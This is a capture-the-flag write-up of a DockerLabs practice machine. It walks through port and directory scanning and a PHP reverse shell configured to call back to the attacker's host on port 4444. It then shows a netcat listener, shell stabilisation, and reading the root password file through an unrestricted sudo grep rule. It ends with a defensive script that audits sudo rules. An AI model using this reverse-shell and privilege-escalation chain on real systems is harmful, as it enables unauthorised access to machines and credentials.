DOCKERLABS MACHINE
DOCKERLABS
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh dockerlabs.tar
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
┌──(root㉿kali)-[/home/kali]
└─# ping -c 3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.052 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.062 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2056ms
rtt min/avg/max/mdev = 0.036/0.050/0.062/0.010 ms
Once the host was confirmed reachable, Nmap, a port-scanning tool, was used to discover which services were running on the machine. The full-range scan revealed that only port 80 (HTTP) was open.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-21 08:15 CET
Initiating ARP Ping Scan at 08:15
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 08:15, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:15
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 08:15, 1.14s elapsed (65535 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000070s latency).
Scanned at 2026-02-21 08:15:57 CET for 1s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Now, let's enumerate the web server with gobuster to discover directories and files, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://172.17.0.2/" -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,exe,back,bak,xml,
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: exe,back,bak,xml,,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 8235]
/uploads (Status: 301) [Size: 310] [--> http://172.17.0.2/uploads/]
/upload.php (Status: 200) [Size: 0]
/machine.php (Status: 200) [Size: 1361]
/server-status (Status: 403) [Size: 275]
Progress: 1764456 / 1764456 (100.00%)
===============================================================
Finished
===============================================================
The gobuster results include /upload.php and the /uploads directory. Now, let's create a PHP reverse shell (reverse.php), as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nano reverse.php
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.17.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Now we have to listen on port 4444 with netcat; once the reverse shell connects, we have access to the victim machine, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
172.17.0.2: inverse host lookup failed: Unknown host
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 59320
Linux ca7d889e38ae 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
08:48:24 up 41 min, 0 user, load average: 0.77, 2.68, 3.21
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@ca7d889e38ae:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
www-data@ca7d889e38ae:/$ export TERM=xterm
www-data@ca7d889e38ae:/$ export SHELL=BASH
www-data@ca7d889e38ae:/$ sudo -l
Matching Defaults entries for www-data on ca7d889e38ae:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User www-data may run the following commands on ca7d889e38ae:
(root) NOPASSWD: /usr/bin/cut
(root) NOPASSWD: /usr/bin/grep
We are going to use the grep entry on GTFOBins, which documents how grep can be used to read files when it may be run with sudo:
https://gtfobins.org/gtfobins/grep/#file-read
www-data@ca7d889e38ae:/home$ cd ..
www-data@ca7d889e38ae:/$ ls
bin dev home lib.usr-is-merged media opt root sbin sys usr
boot etc lib lib64 mnt proc run srv tmp var
www-data@ca7d889e38ae:/$ cd /opt/
www-data@ca7d889e38ae:/opt$ ls
nota.txt
www-data@ca7d889e38ae:/opt$ cat nota.txt
Protege la clave de root, se encuentra en su directorio /root/clave.txt, menos mal que nadie tiene permisos para acceder a ella.
www-data@ca7d889e38ae:/opt$
Gotcha! We have discovered the root password with the command sudo -u "root" /usr/bin/grep '' /root/clave.txt: the empty pattern matches every line, so grep, running as root, prints the whole file. The password is dockerlabsmolamogollon123, as you can see below.
www-data@ca7d889e38ae:/opt$ sudo -u "root" /usr/bin/grep '' /root/clave.txt
dockerlabsmolamogollon123
www-data@ca7d889e38ae:/opt$ su root
Password:
root@ca7d889e38ae:/opt# whoami
root
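The privilege escalation above works because the sudoers rules grant /usr/bin/grep and /usr/bin/cut as root with no argument restriction, so file permissions on /root/clave.txt never matter. The script below is an added example (not part of the original write-up or of DockerLabs) that parses `sudo -l` output, flags NOPASSWD rules for file-reading binaries that have no pinned arguments, and emulates which invocations a rule permits. The first sudo -l text is a constructed copy of what the machine printed; the argument-pinned rule in the second block is invented for contrast, and the extra binaries beyond grep and cut are assumed additions. Only exact argument matching is emulated (sudoers wildcards are not).

```python
"""Audit `sudo -l` output for NOPASSWD rules that grant root-level reads of any
file, and emulate which concrete invocations such rules permit.

Added example: constructed input, not code from the original write-up.
"""
import re
import shlex
from dataclasses import dataclass

# Utilities that print file contents when run as root with unrestricted arguments
# (the GTFOBins "file read" category). grep and cut are the two on the machine;
# the rest are assumed additions for this demo.
FILE_READ_BINARIES = {"grep", "cut", "cat", "head", "tail", "less", "more", "awk", "sed"}

# "(root) NOPASSWD: /usr/bin/grep" -> runas="root", tags="NOPASSWD: ", cmd="/usr/bin/grep"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/.*)$")


@dataclass
class SudoRule:
    runas: str        # user the command runs as, e.g. "root"
    nopasswd: bool    # True when the NOPASSWD tag is present
    command: str      # command spec exactly as printed by sudo -l

    @property
    def argv(self):
        return shlex.split(self.command)

    @property
    def binary(self):
        return self.argv[0].rsplit("/", 1)[-1]

    @property
    def unrestricted(self):
        # In sudoers, a bare command path (no arguments) allows ANY arguments.
        return len(self.argv) == 1


def parse_sudo_l(text):
    """Return the SudoRule entries from `sudo -l` output; the Defaults block is ignored."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append(SudoRule(
                runas=m.group("runas").split(":")[0].strip(),
                nopasswd="NOPASSWD:" in m.group("tags"),
                command=m.group("cmd").strip(),
            ))
    return rules


def risky_rules(rules):
    """Rules that give arbitrary file reads as root: root run-as, file-read binary, no pinned args."""
    return [r for r in rules
            if r.runas in ("root", "ALL")
            and r.binary in FILE_READ_BINARIES
            and r.unrestricted]


def sudo_permits(rules, runas, argv):
    """Emulate sudoers matching for one invocation (exact arguments; wildcards not modelled).
    `argv` is the full command line, e.g. ["/usr/bin/grep", "", "/root/clave.txt"]."""
    for r in rules:
        if r.runas not in (runas, "ALL") or r.argv[0] != argv[0]:
            continue
        if r.unrestricted:
            return True                  # bare path: any arguments allowed
        if r.argv[1:] == [""]:
            return argv[1:] == []        # '""' in sudoers: no arguments allowed at all
        if r.argv[1:] == argv[1:]:
            return True                  # pinned arguments must match exactly
    return False


# Constructed copy of the sudo -l output from the machine.
SUDO_L_MACHINE = """
Matching Defaults entries for www-data on ca7d889e38ae:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
    use_pty

User www-data may run the following commands on ca7d889e38ae:
    (root) NOPASSWD: /usr/bin/cut
    (root) NOPASSWD: /usr/bin/grep
"""

# Invented hardened variant: same binary, but the arguments are pinned in sudoers.
SUDO_L_HARDENED = """
User www-data may run the following commands on ca7d889e38ae:
    (root) NOPASSWD: /usr/bin/grep -c ERROR /var/log/app/error.log
"""

if __name__ == "__main__":
    rules = parse_sudo_l(SUDO_L_MACHINE)
    for r in risky_rules(rules):
        print(f"RISK: ({r.runas}) {r.command} -> unrestricted '{r.binary}' can read any file as root")
    print("grep '' /root/clave.txt permitted on machine:",
          sudo_permits(rules, "root", ["/usr/bin/grep", "", "/root/clave.txt"]))
    print("grep '' /root/clave.txt permitted when pinned:",
          sudo_permits(parse_sudo_l(SUDO_L_HARDENED), "root", ["/usr/bin/grep", "", "/root/clave.txt"]))
```

Run as-is and both machine rules are reported; the pinned rule is not flagged because only the exact `-c ERROR /var/log/app/error.log` invocation is accepted. The fix for a box like this is the same in practice: never grant a general-purpose text utility as root without pinning its arguments, or wrap the one needed command in a script and grant only that.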
Thank you very much for reading this article.